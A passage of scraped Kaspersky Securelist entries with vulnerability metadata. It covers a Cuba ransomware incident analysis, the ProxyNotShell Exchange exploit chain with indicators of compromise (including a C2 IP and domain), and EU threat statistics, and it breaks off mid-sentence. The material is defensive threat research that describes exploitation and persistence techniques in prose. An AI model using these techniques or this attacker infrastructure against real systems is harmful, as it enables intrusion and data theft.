systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153724/Cuba_ransomware_29.png>)\n\nSending malicious files via gotoassistui.exe\n\nWe also found that new Bughatch samples were being executed. These used slightly different file names, callback functions and C2 servers, as our systems were successfully blocking older versions of the malware at that time.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153814/Cuba_ransomware_30.png>)\n\nBughatch activity\n\n#### SqlDbAdmin\n\nWe wondered who that SqlDbAdmin was. The answer came through a suspicious DLL, addp.dll, which we found manually on a compromised host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153857/Cuba_ransomware_31.png>)\n\nSuspicious dynamic library\n\nWe found that it used the WIN API function NetUserAdd to create the user. The name and password were hard-coded inside the DLL.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08153937/Cuba_ransomware_32.png>)\n\nAnalysis of addp.dll\n\nAs we looked further into the library, we found that it used the **RegCreateKey** function to enable RDP sessions for the newly created user by modifying a registry setting. The library then added the user to the Special Account registry tree to hide it from the system login screen, an interesting and fairly unconventional persistence technique. In most cases, bad actors add new users with the help of scripts thatsecurity products rarely miss.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154040/Cuba_ransomware_33.png>)\n\nAnalysis of addp.dll\n\n#### Cobalt Strike\n\nWe found a suspicious DLL, ion.dll, running on the Exchange server as part of the rundll32 process with unusual execution options. At first, we figured that the activity was similar to what we had earlier seen with Bughatch. However, further analysis showed that the library was, in fact, a Cobalt Strike Beacon.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154119/Cuba_ransomware_34.png>)\n\nExecution of the suspicious ion.dll file\n\nWhen we were looking at the ion.dll code, what caught our attention was execution settings and a function that uses the Cobalt Strike configuration. The library used the VirtualAlloc function for allocating process memory to execute the Cobalt Strike Beacon payload in, later.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154153/Cuba_ransomware_35.png>)\n\nAnalysis of ion.dll\n\nAll configuration data was encrypted, but we did find the function used for decrypting that. To find the Cobalt Strike C2 server, we inspected a rundll32 memory dump with ion.dll loaded into it, running with the same settings it did on the victim host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154225/Cuba_ransomware_36.png>)\n\nMemory dump of rundll32\n\nFinding out the name of the C2 helped us to locate the history of communications with that server within the telemetry data. After the malware connected to the C2, it downloaded two suspicious files into the Windows folder on the infected server and then executed these. Unfortunately, we were not able to obtain the two files for analysis, as the hackers had failed to disable security at the previous step, and the files were wiped off the infected host. We do believe, though, that what we were dealing with was the ransomware itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154301/Cuba_ransomware_37.png>)\n\nCommunications with the attackers' C2 server\n\nThe customer promptly isolated the affected hosts and forwarded the incident to the Kaspersky Incident Response team for further investigation and search for possible artifacts. This was the last we saw of the malicious actor's activity in the customer system. The hosts avoided encryption thanks to the customer following our recommendations and directions, and responding to the incident in time.\n\n## New malware\n\nWe found that VirusTotal contained new samples of the Cuba malware with the same file metadata as the ones in the incident described above. Some of those samples had successfully evaded detection by all cybersecurity vendors. We ran our analysis on each of the samples. As you can see from the screenshot below, these are new versions of Burntcigar using encrypted data for anti-malware evasion. We have made Yara rules that detect these new samples, and we are providing these in the attachment to this article.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154344/Cuba_ransomware_38.png>)\n\nNew malware samples\n\n## BYOVD (Bring Your Own Vulnerable Driver)\n\nWe will now take a closer look at an attack that uses insecure drivers, which we observed as we investigated the incident and which is currently growing in popularity as various APT and ransomware gangs add it to their arsenals.\n\nBring Your Own Vulnerable Driver (BYOVD) is a type of attack where the bad actor uses legitimate signed drivers that are known to contain a security hole to execute malicious actions inside the system. If successful, the attacker will be able to exploit the vulnerabilities in the driver code to run any malicious actions at kernel level!\n\nUnderstanding why this is one of the most dangerous kinds of attacks takes a quick refresher on what drivers are. A driver is a type of software that acts as an intermediary between the operating system and the device. The driver converts OS instructions into commands that the device can interpret and execute. A further use of drivers is supporting applications or features that the operating system originally lacks. As you can see from the image below, the driver is a layer of sorts between user mode and kernel mode.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/08154422/Cuba_ransomware_39.png>)\n\nUser mode and kernel mode interaction diagram. Source: \n<https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode>\n\nApplications running in user mode have fewer privileges to control the system. All they can get access to is a virtualized memory area that is isolated and protected from the rest of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. The driver can get access to critical security structures and modify those. Modifications like that make the system liable to attacks that use privilege escalation, disabling of OS security services, and arbitrary reading and writing.\n\nThe [Lazarus](<https://www.bleepingcomputer.com/news/security/lazarus-hackers-abuse-dell-driver-bug-using-new-fudmodule-rootkit/>) gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the [CVE-2021-21551](<https://vulners.com/cve/CVE-2021-21551>) vulnerability.\n\nThere is no sure-fire defense from legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of techniques:\n\n * Enable Hypervisor-Protected Code Integrity.\n * Enable Memory Integrity.\n * Enable validation of driver digital signatures.\n * Use the [vulnerable driver blocklist](<https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules>).\n\nHowever, [studies](<https://habr.com/ru/companies/kaspersky/articles/693840/>) suggest that the recommendations are irrelevant even with every Windows protection feature enabled, and attacks like these go through anyway.\n\nTo counter this technique, many security vendors started adding a self-defense module into their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our [products](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-select>) have that feature too, and it proved effective during the incident.\n\n## Conclusion\n\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods including fairly dangerous ones, such as BYOVD. Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\n\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\n\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\n\n## Appendix\n\nSigma and YARA rules: <https://github.com/BlureL/SigmaYara-Rules> \nIndicators of Compromise: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/14105934/Cuba-ransomware-IoCs-02.pdf>) \nMitre ATT&CK matrices: [Download PDF](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/09/11095522/Cuba-ransomware-TTPs.pdf>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-11T10:00:26", "type": "securelist", "title": "From Caribbean shores to your devices: analyzing Cuba ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-21551", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-26500", "CVE-2022-26501", "CVE-2022-26504", "CVE-2022-26522", "CVE-2022-26523"], "modified": "2023-09-11T10:00:26", "id": "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "href": "https://securelist.com/cuba-ransomware/110533/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-19T16:54:06", "description": "\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Using an insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account, can gain access to the privileged endpoint of the Exchange Server API (**https://%_exchange server domain%_/powershell)**. This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. In the published PoC, this process is **calc.exe**.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start new process_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post exploitation\n\nA few weeks later after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side all processes that are started via exploitation have a main parent process with certain parameters: **w3wp.exe -ap "msexchangepowershellapppool".**\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by [TrendMicro](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.trendmicro.com%2Fpl_pl%2Fresearch%2F22%2Fg%2Flog4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html&data=05%7C01%7Cmapp%40microsoft.com%7C6ea0cb7fcd7d4d2ea92808dab12e25ff%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C638017110445189023%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=O5D%2B8%2BG%2F%2BthCuhizLONIBuphB6uNAL%2Fp%2BrWWkWfQGa0%3D&reserved=0>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of actual TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n---|---|---|--- \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok \nHEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n193.149.185.52:443 | \u04212 server \nsync.service.auzreservices.com | \u04212 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-26T10:37:33", "description": "\n\n_All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from May 2020 to April 2021, inclusive._\n\n## Main figures\n\n * **70% **of Internet user computers in the EU experienced at least one **Malware-class** attack.\n * In the EU, Kaspersky solutions blocked **115,452,157** web attacks.\n * **2,676,988 **unique URLs were recognized as malicious by our Web Anti-Virus.\n * **377,685 **unique malicious objects were blocked by our Web Anti-Virus.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of **79,315** users.\n * **56,877 **unique users in the EU were attacked by ransomware.\n * **132,656 **unique users in the EU were attacked by miners.\n * **40%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n * **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU.\n\n## Financial threats\n\n_The statistics include not only banking threats, but malware for ATMs and payment terminals._\n\n### Number of users attacked by banking malware\n\nDuring the reporting period, Kaspersky solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of **79,315** users.\n\n_Number of EU users attacked by financial malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124132/01-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware, for each EU country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all attacked users in that country.\n\n_Geography of banking malware attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124226/02-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Cyprus | 1.3 \n2 | Bulgaria | 1.2 \n3 | Greece | 1.1 \n4 | Italy | 1.0 \n5 | Portugal | 1.0 \n6 | Croatia | 0.8 \n7 | Germany | 0.6 \n8 | Latvia | 0.6 \n9 | Poland | 0.6 \n10 | Romania | 0.6 \n \n_* The share of unique users in the EU whose computers were targeted by financial malware in the total number of unique EU users attacked by all kinds of malware._\n\n**Top 10 financial malware families**\n\n| **Name** | **%*** \n---|---|--- \n1 | Zbot | 24.7 \n2 | Nymaim | 11.5 \n3 | Danabot | 9.9 \n4 | Emotet | 8.9 \n5 | CliptoShuffler | 7.7 \n6 | BitStealer | 5.6 \n7 | SpyEyes | 3.5 \n8 | Gozi | 3.4 \n9 | Dridex | 3.2 \n10 | Trickster | 1.9 \n \n_* The share of unique users in the EU attacked by this malware in the total number of users attacked by financial malware._\n\n## Ransomware programs\n\nDuring the reporting period, we identified more than **17,317 **ransomware modifications and detected **25** new families. Note that we did not create a separate family for each new piece of ransomware. Most threats of this type were assigned the generic verdict, which we give to new and unknown samples.\n\n_Number of new ransomware modifications detected in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124303/03-en-european-ksb-2021.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nDuring the reporting period, ransomware Trojans attacked **56,877** unique users, including **12,358** corporate users (excluding SMBs) and **2,274** users associated with small and medium-sized businesses.\n\n_Number of users in the EU attacked by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124332/04-en-european-ksb-2021.png>))_\n\n### Threat geography\n\n_Geography of attacks in the EU by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124520/05-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 0.56 \n2 | Cyprus | 0.38 \n3 | Portugal | 0.36 \n4 | Bulgaria | 0.31 \n5 | Hungary | 0.29 \n6 | Italy | 0.29 \n7 | Latvia | 0.28 \n8 | Slovenia | 0.27 \n9 | Spain | 0.26 \n10 | Estonia | 0.23 \n \n_* The share of unique users in the EU country whose computers were targeted by ransomware in the total number of unique users in that country attacked by all kinds of malware._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Gen | 14.40 \n2 | (generic verdict) | Trojan-Ransom.Win32.Agent | 12.58 \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 10.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 5.94 \n5 | Stop | Trojan-Ransom.Win32.Stop | 3.87 \n6 | WannaCry | Trojan-Ransom.Win32.Wanna | 3.20 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 2.31 \n8 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.30 \n9 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.97 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.85 \n \n_* The share of unique Kaspersky users attacked by the given family of ransomware Trojans in the total number of users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of users attacked by miners in the EU\n\nDuring the reporting period, we detected attempts to install a miner on the computers of **132,656** unique users. Miners accounted for 0.53% of all attacks and 10.31% of all Risktool-type programs\n\n_Number of EU users attacked by miners, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124550/06-en-european-ksb-2021.png>))_\n\nDuring the reporting period, Kaspersky products detected Trojan.Win32.Miner.gen (generic verdict) more often than others, which accounted for 13.62% of all users attacked by miners. It was followed by Trojan.Win32.Miner.bbb (8.67%) and Trojan.JS.Miner.m (2.84%).\n\n### Threat geography\n\n_Geography of miner-related attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124619/07-en-european-ksb-2021.png>))_\n\n## Vulnerable applications used by cybercriminals\n\nIn 2020, most vulnerabilities were discovered by researchers before attackers could exploit them. However, there was no doing without zero-day vulnerabilities, of which Kaspersky found:\n\n * CVE-2020-1380, a use-after-free vulnerability in the Jscript9 component of Microsoft's Internet Explorer browser caused by insufficient checks during the generation of optimized JIT code. This vulnerability was most likely used by the APT group [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) at the first stage of system compromise, after which the payload was delivered by an additional exploit that escalated privileges in the system;\n * CVE-2020-0986 in the GDI Print/Print Spooler component of Microsoft's Windows operating system, enabling manipulation of process memory for arbitrary code execution in the context of a system service process. Exploitation of this vulnerability gives attackers the ability to bypass sandboxes, for example, in the browser.\n\nThe first quarter of 2021 turned out to be rich not only in well-known vulnerabilities, but also in zero-day ones. In particular, both [IT security specialists](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals showed great interest in the new Microsoft Exchange Server vulnerabilities:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) \u2014 a Service-Side Request Forgery vulnerability that allows an attacker to make a forged server request and execute arbitrary code (RCE);\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) \u2014 insecure object deserialization by the Unified Messaging service, which can lead to arbitrary code execution on the server side;\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) \u2014 allows an attacker to write data to server files, which can also lead to remote code execution;\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) \u2014 similar to [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), this vulnerability allow an authorized Microsoft Exchange user to write arbitrary code to system files.\n\nThese vulnerabilities were found [in-the-wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and had been used by APT and ransomware groups.\n\nOne more constellation of vulnerabilities that appeared in the infosec sky was a threesome of critical bugs in the popular SolarWinds Orion Platform \u2013 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>), [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>). Successful exploitation of any of them can cause infection of the system where the platform is installed (mostly, enterprise and government PCs).\n\n_Distribution of exploits used in attacks by type of application attacked, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124650/08-en-european-ksb-2021.png>))_\n\n_The rating of vulnerable applications is based on verdicts by Kaspersky products for blocked exploits used by cybercriminals both in network attacks and in vulnerable local apps, including on users' mobile devices._\n\nNetwork attacks were the most common method of system penetration, and a significant portion of them is made up of brute-force attacks on various network services: [RDP](<https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/>), Microsoft SQL Server, etc. In addition, the year gone by demonstrated that everything in the Windows operating system is cyclical, and that most of the detected vulnerabilities exist in the same services, for example, in the drivers of the SMB (SMBGhost, SMBBleed), DNS (SigRed) and ICMPv6 (BadNeighbor) network protocols. Two critical vulnerabilities (CVE-2020-0609, CVE-2020-0610) were found in the Remote Desktop Gateway service. An interesting vulnerability, dubbed Zerologon, was also discovered in the NetLogon service. In Q1 2021, researchers found three new vulnerabilities in Windows network stack code related to IPv4/IPv6 protocols processing \u2014 [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>). Lastly, despite the fact that exploits for the EternalBlue and EternalRomance families are old, they are still used by attackers.\n\n## Attacks on macOS\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.50 \n2 | AdWare.OSX.Bnodlero.at | 12.04 \n3 | AdWare.OSX.Bnodlero.ay | 11.42 \n4 | AdWare.OSX.Bnodlero.ax | 10.56 \n5 | AdWare.OSX.Bnodlero.bg | 9.18 \n6 | Trojan-Downloader.OSX.Shlayer.a | 8.06 \n7 | AdWare.OSX.Pirrit.j | 6.23 \n8 | AdWare.OSX.Pirrit.ac | 6.05 \n9 | AdWare.OSX.Ketin.h | 5.30 \n10 | AdWare.OSX.Bnodlero.t | 4.94 \n11 | AdWare.OSX.Bnodlero.av | 4.82 \n12 | Trojan-Downloader.OSX.Agent.h | 4.48 \n13 | AdWare.OSX.Pirrit.o | 4.35 \n14 | AdWare.OSX.Cimpli.k | 3.75 \n15 | AdWare.OSX.Pirrit.gen | 3.75 \n16 | AdWare.OSX.Pirrit.aa | 3.58 \n17 | AdWare.OSX.Ketin.m | 3.22 \n18 | AdWare.OSX.Pirrit.q | 3.20 \n19 | AdWare.OSX.Ketin.l | 3.13 \n20 | AdWare.OSX.Spc.a | 2.87 \n \n_* The share of unique users who encountered this threat in the total number of users of Kaspersky security solutions for macOS who were attacked._\n\n### Threat geography\n\n_Geography of attacked macOS users in EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124726/09-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked macOS users **\n\n| **Country** | **%*** \n---|---|--- \n1 | France | 15.32 \n2 | Spain | 13.99 \n3 | Italy | 11.43 \n4 | Portugal | 9.75 \n5 | Greece | 9.59 \n6 | Germany | 9.41 \n7 | Hungary | 8.60 \n8 | Lithuania | 8.14 \n9 | Poland | 8.10 \n10 | Belgium | 7.94 \n \n_* The share of unique users attacked in the total number of users of Kaspersky security solutions for macOS in the country._\n\n## IoT attacks\n\n### IoT threat statistics\n\nDuring the reporting period, more than 80% of attacks on Kaspersky traps were carried out using the Telnet protocol.\n\nTelnet | 81.31% \n---|--- \nSSH | 18.69% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, May 2020 \u2013 April 2021_\n\nAs for distribution of sessions, Telnet also prevails, accounting for 